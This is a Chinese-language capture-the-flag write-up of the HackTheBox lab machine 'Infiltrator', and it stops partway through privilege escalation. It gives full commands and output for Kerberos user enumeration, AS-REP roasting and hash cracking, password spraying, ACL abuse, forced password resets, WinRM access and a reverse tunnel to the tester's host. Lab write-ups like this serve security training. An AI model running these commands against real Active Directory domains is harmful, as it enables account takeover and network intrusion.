Infiltrator

(Updated: )
MachinesWindowsInsane

Recon & Enum

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Infiltrator.htb
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-14 00:14:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Issuer: commonName=dc01.infiltrator.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-30T13:20:17
| Not valid after:  2025-01-29T13:20:17
| MD5:   be1d:a071:bf6d:fff0:20c0:6b23:8e7e:1763
|_SHA-1: cbda:6e22:6ccf:b5e7:534c:b9f0:d9e7:c5d8:dab9:769e
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: INFILTRATOR
|   NetBIOS_Domain_Name: INFILTRATOR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: infiltrator.htb
|   DNS_Computer_Name: dc01.infiltrator.htb
|   DNS_Tree_Name: infiltrator.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-14T00:17:00+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
15220/tcp open  unknown
15230/tcp open  unknown
49666/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49723/tcp open  msrpc         Microsoft Windows RPC
49736/tcp open  msrpc         Microsoft Windows RPC
49877/tcp open  msrpc         Microsoft Windows RPC

DNS

这里可以先挂后台跑,如果后面的枚举有新的成果,可以直接中断

1
gobuster dns -w /usr/share/seclists/Discovery/DNS/n0kovo_subdomains.txt -d infiltrator.htb -o log/dns.log -r infiltrator.htb

Web Dir

这里可以先挂后台跑,如果后面的枚举有新的成果,可以直接中断

1
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -o log/web_dir.log -u http://infiltrator.htb/

Rpc

1
rpcclient infiltrator.htb -U 'guest%'

LDAP

1
ldapsearch -x -H ldap://infiltrator.htb -s base

SMB

1
2
netexec smb infiltrator.htb -u guest -p '' --shares
netexec smb infiltrator.htb -u guest -p '' --rid-brute 10000

Shell as M.Harris

在 Web 页面中发现了团队成员,保存名称

1
2
3
4
5
6
7
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez

生成用户名组合,使用 kerbrute 枚举用户名

1
2
3
4
5
6
7
8
9
10
11
kerbrute userenum --dc infiltrator.htb -d infiltrator.htb info/dic_user.list -o log/kerbrute_username.log
---
...
2024/11/14 20:30:39 >  [+] VALID USERNAME:       D.Anderson@infiltrator.htb
2024/11/14 20:30:39 >  [+] VALID USERNAME:       O.Martinez@infiltrator.htb
2024/11/14 20:30:39 >  [+] VALID USERNAME:       K.Turner@infiltrator.htb
2024/11/14 20:30:39 >  [+] VALID USERNAME:       A.Walker@infiltrator.htb
2024/11/14 20:30:39 >  [+] VALID USERNAME:       M.Harris@infiltrator.htb
2024/11/14 20:30:40 >  [+] VALID USERNAME:       E.Rodriguez@infiltrator.htb
2024/11/14 20:30:40 >  [+] VALID USERNAME:       L.Clark@infiltrator.htb
2024/11/14 20:30:45 >  Done! Tested 77 usernames (7 valid) in 5.990 **seconds**

AS-REP Roasting

1
2
3
4
5
6
7
8
9
10
11
impacket-GetNPUsers -no-pass -usersfile info/user.list infiltrator.htb/
---
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User D.Anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User O.Martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User K.Turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User E.Rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$L.Clark@INFILTRATOR.HTB:59de0be66010a9b1a6d556b9dc40655c$c0a83a0c13c9d3c93845780d212b475ab9dfd03664fc96389a5b4a8a7b72b876309ec91711f79d884f88093518c1fd7c6c392ff1c56cc9b2b6f4b84902023c9fbc1ffb31d19fb65cbefebad093167c7ae1b7939e3b049f0efc404dfd0be057341484c578620f33ba407c998d20897e29bc56ec1c178b07c6bc6132c7b8aa4cc2001b6ccc0e994d78b9427f96c1329a078858eb8300170ad0bf6d5efcce373b3faa17939f71118d1832079db985a6c39904407c5d7e8706798bef1d2b5230a359fdba5303a11367b052af688630da080db393c07064a69fffd715a4c7bbe8533e3b48bfe5c344cb693f0cf79a505f744d8ef3
  • 识别 Hash
1
2
3
4
5
nth -f info/KRB_AS_REP.hash
---
...
Kerberos 5 AS-REP etype 23, HC: 18200 JtR: krb5pa-sha1 Summary: Used for Windows Active Directory
...
  • Hashcat 爆破
1
2
3
4
5
hashcat -m 18200 info/KRB_AS_REP.hash /usr/share/wordlists/rockyou.txt
---
...
$krb5asrep$23$L.Clark@INFILTRATOR.HTB:65969ff15f18ac84bd58a6185f7ccd24$93a0a81d05fc4e025b62fd665a350fdfbd750f4e7af34c2bd222ab727fd4a7fa5633c3dde88ed20df3ba406637168e9b45fcf9397784039601cac294c2ecd8cb6b24efec7ee83bece85a0a1a98f2852698284b8912e88fae047d9fdd9c88dfdbccf44c61eaa50427a5415260ebfe26f3db3c2a1efc996a2d92086589f515383854ae3502f0834e0da01ca5d20783d4a6ba3cd6019163df47c291bd99950e16deafa5bf5d7ccc39cfab61c5b71912b9aed41b259c708945e2b51c7d5fb5f7d0dae3cc955efa7ac9569ce98181e306ebc3834a1dd97817e9d6c03f4dfff165f526cc2b2a4b72c418b68cc6ccae4783cb73bd31:WAT?watismypass!
...

拿到凭据 L.Clark : WAT?watismypass!

LDAP Enum user

1
netexec ldap infiltrator.htb -u 'L.Clark' -p 'WAT?watismypass!' --users

这里拿到了一个 K.turner 用户的备注,很像密码,先保存 MessengerApp@Pass!

密码喷射

1
2
kerbrute passwordspray -d infiltrator.htb --dc 10.10.11.31 info/user.list 'WAT?watismypass!'
kerbrute passwordspray -d infiltrator.htb --dc 10.10.11.31 info/user.list 'MessengerApp@Pass!'

两个用户使用的是这个密码,可以再枚举一下共享目录

1
netexec smb infiltrator.htb -u info/user.list -p 'WAT?watismypass!' --shares

只有 L.Clark 有共享目录

SMB

使用爬取模块,把共享目录文件信息下载到本地

1
netexec smb infiltrator.htb -u L.Clark -p 'WAT?watismypass!' -M "spider_plus"

从共享文件的名称和大小,没发现什么闪光点,这里也可以每个都查看一下。

WinRM

1
netexec winrm infiltrator.htb -u info/user.list -p info/pass.list

WinRM 无法登录

BloodHound

1
bloodhound-python -c all --zip -dc 'infiltrator.htb' -ns '10.10.11.31' -d 'infiltrator.htb' -u 'L.Clark' -p 'WAT?watismypass!'

查看高价值路径

这个路径可以拿到 M.Harris 的权限,从而远程登录机器拿到 User Shell

首先修改 E.Rodriguez 的密码

1
2
3
4
5
6
7
# 获取 D.Anderson 票据
impacket-getTGT 'infiltrator.htb'/'D.Anderson':'WAT?watismypass!'

# 更改 FullControl 权限
KRB5CCNAME=D.Anderson.ccache /usr/share/doc/python3-impacket/examples/dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'D.Anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb'/'D.Anderson':'WAT?watismypass!' -dc-ip dc01.infiltrator.htb -k -no-pass

bloodyAD --host "dc01.infiltrator.htb" -d 'infiltrator.htb' -u 'D.Anderson' -p 'WAT?watismypass!' -k --dc-ip '10.10.11.31' set password 'E.Rodriguez' 'Admin@123'

然后 E.Rodriguez 把自己添加到 Chiefs Marketing 组中

1
bloodyAD --host "dc01.infiltrator.htb" -d 'infiltrator.htb' -u 'E.Rodriguez' -p 'Admin@123' -k --dc-ip '10.10.11.31' add groupMember 'Chiefs Marketing' 'E.Rodriguez'

再修改 M.Harris 的密码

1
bloodyAD --host "dc01.infiltrator.htb" -d 'infiltrator.htb' -u 'E.Rodriguez' -p 'Admin@123' -k --dc-ip '10.10.11.31' set password 'M.Harris' 'Admin@123'

然后可以使用 M.Harris 账户远程登录了

直接连是不行的,需要使用 Kerberos 认证票据

1
2
impacket-getTGT 'infiltrator.htb'/'M.Harris':'Admin@123'
KRB5CCNAME=M.Harris.ccache evil-winrm -i 'dc01.infiltrator.htb' -u 'M.Harris' -p 'Admin@123' -r 'infiltrator.htb'

还是出现报错,同时也提示可以省略用户名和密码,这里的原因是 KDC 对于域名 INFILTRATOR.HTB 无法定位需要修改 /etc/krb5.conf 配置文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
[libdefaults]
    default_realm = INFILTRATOR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true
[realms]
    INFILTRATOR.HTB = {
        kdc = dc01.infiltrator.htb
        admin_server = dc01.infiltrator.htb
    }
[domain_realm]
    .infiltrator.htb = INFILTRATOR.HTB
    infiltrator.htb = INFILTRATOR.HTB

再次尝试登录

1
KRB5CCNAME=M.Harris.ccache evil-winrm -i 'dc01.infiltrator.htb' -r 'infiltrator.htb'

成功获取 Shell 权限,这里为了方便使用 Havoc 上线,然后使用 WinPEAS 枚举本地提权路径

Shell as Administrator

在 WinPEAS 中可以看到 14*** 端口有一些服务,把 14*** 的端口转发到本地

1
shell c.exe client -v 10.10.16.44:8080 R:0.0.0.0:14406:127.0.0.1:14406 R:0.0.0.0:14118:127.0.0.1:14118 R:0.0.0.0:14122:127.0.0.1:14122 R:0.0.0.0:14123:127.0.0.1:14123 R:0.0.0.0:14125:127.0.0.1:14125 R:0.0.0.0:14126:127.0.0.1:14126 R:0.0.0.0:14127:127.0.0.1:14127 R:0.0.0.0:14128:127.0.0.1:14128 R:0.0.0.0:14130:127.0.0.1:14130

扫描一下这些端口的信息

1
2
3
4
5
6
7
8
9
10
11
12
nmap --min-rate 1000 -T4 -sV -p 14406,14130,14128,14118,14126,14127,14125,14122,14123 127.0.0.1
---
PORT      STATE SERVICE     VERSION
14118/tcp open  ssl/unknown
14122/tcp open  unknown
14123/tcp open  http        Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
14125/tcp open  http        Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
14126/tcp open  http        Apache httpd 2.4.9 ((Win32) PHP/5.5.12)
14127/tcp open  unknown
14128/tcp open  unknown
14130/tcp open  unknown
14406/tcp open  mysql       MySQL 5.5.5-10.1.19-MariaDB

先试试 MySQL

这里提示是需要密码的,试一下前面没用上的 MessengerApp@Pass!

还是不对,再看看几个 HTTP 服务,先看 14123 的

前面发现的 K.turner 用户的备注信息就是 OutPut Messenger 的密码。

发现一些聊天记录,但是没啥营养,再看一下另外两个端口

也没什么东西,去搜一下 Output Messenger 相关漏洞

可以看到这个 MYSQL 是加载的这个配置文件 C:\Program Files\Output Messenger Server\Plugins\Output\mysql\my.ini

但是这个目录没有权限访问,转到 WinPEAS 中可以看到,目录内的某些目录是可以访问的

尝试访问也是失败了,那么找一下这个目录下面有没有什么敏感文件